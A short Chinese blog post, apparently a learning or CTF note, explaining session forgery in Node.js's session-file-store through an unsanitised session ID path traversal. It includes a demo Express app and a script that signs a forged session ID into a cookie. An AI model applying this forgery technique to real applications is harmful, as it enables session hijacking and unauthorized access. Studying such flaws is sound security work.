session-file-store库的session伪造

前言

学了几天node,接触到的知识点这里记录一下。

利用过程

漏洞点分析这里就不写了,参考:https://xz.aliyun.com/t/4676#toc-2
文章写的很详细。这里吧最根源的点写出来

1
2
3
4
sessionPath: function (options, sessionId) {
//return path.join(basepath, sessionId + '.json');
return path.join(options.path, sessionId + options.fileExtension);
}

这里sessionID没有过滤任何路径啥的导致可以直接来让 session-file-store 将不属于sessions目录的文件夹下的json文件当作session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
var express = require('express');
var app = express();
var session = require('express-session');
var FileStore = require('session-file-store')(session);

app.use(session({
store: new FileStore(),
secret: 'keyboard cat',
resave: false,
saveUninitialized: false,
rolling: true,
})
);
app.get('/', function (req, res) {
if (req.session.views) {
req.session.views++;
res.setHeader('Content-Type', 'text/html');
res.write('<p>views: ' + req.session.views + '</p>');
res.end();
} else {
req.session.views = 1;
res.end('Welcome to the file session demo. Refresh page!');
}
});
var server = app.listen(1337, function () {
var host = server.address().address;
var port = server.address().port;
console.log('Example app listening at http://%s:%s', host, port);
});

伪造脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
var cookie = require('cookie');
var crc = require('crc').crc32;
var debug = require('debug')('express-session');
var deprecate = require('depd')('express-session');
var parseUrl = require('parseurl');
var uid = require('uid-safe').sync
, onHeaders = require('on-headers')
, signature = require('cookie-signature')

var val = ""; //修改后的sessionID
var secret = ""; //签名session用的密钥
var name = "name";
var options = undefined;
var signed = 's:' + signature.sign(val, secret);
var data = cookie.serialize(name, signed, options);

debug('set-cookie %s', data);
console.log(data);

把次脚本放在node_modules/express-session目录下
image.png
把伪造的json放在根目录,具体题目路径不一样,对应修改一下就行

image.png
image.png
image.png
image.png
岂不美哉。

-------------本文结束感谢您的阅读-------------